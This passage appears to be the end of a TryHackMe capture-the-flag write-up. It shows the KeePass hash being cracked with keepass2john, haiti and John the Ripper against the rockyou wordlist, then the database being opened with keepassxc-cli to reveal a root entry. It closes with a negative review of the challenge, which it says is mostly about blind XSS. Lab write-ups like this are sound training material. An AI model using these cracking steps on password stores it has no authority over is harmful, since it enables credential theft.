  2. Find the JtR reference with haiti
  3. Crack the hash with JtR
1
2
3
4
$ keepass2john Database.kdbx.decrypt > hash.txt
$ cat hash.txt | cut -f 2 -d : | haiti -
KeePass 2 AES / without keyfile [HC: 13400] [JtR: keepass]
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=keepass

Once cracked access the Keepass database:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ keepassxc-cli ls Database.kdbx.decrypt
Saisir le mot de passe pour déverrouiller Database.kdbx.decrypt :
THM
General/
Windows/
Network/
Internet/
eMail/
Homebanking/
Recycle Bin/

$ keepassxc-cli show Database.kdbx.decrypt THM --show-protected
Saisir le mot de passe pour déverrouiller Database.kdbx.decrypt :
Title: THM
UserName: root
Maximum depth of replacement has been reached. Entry uuid: {531b7ab3-73b9-914e-a55c-756fa66edb73}
Password: THM{EDITED}
URL:
Notes:
Uuid: {531b7ab3-73b9-914e-a55c-756fa66edb73}
Tags

Conclusion#

The idea was good but was ruined by the implementation (mostly because of PhantomJS). More pain than joy. I didn't learnt much doing it. What attracted me doing the challenge was the GraphQL keyword but in the end GraphQL in this challenged is marginal, it's mostly about blind XSS. There are several steps that won't work if you don't exactly copy the author payload or command, and valid commands that would work on real life that doesn't work on the challenge. I judge the challenge being bad and I wouldn't recommend someone doing it.

Share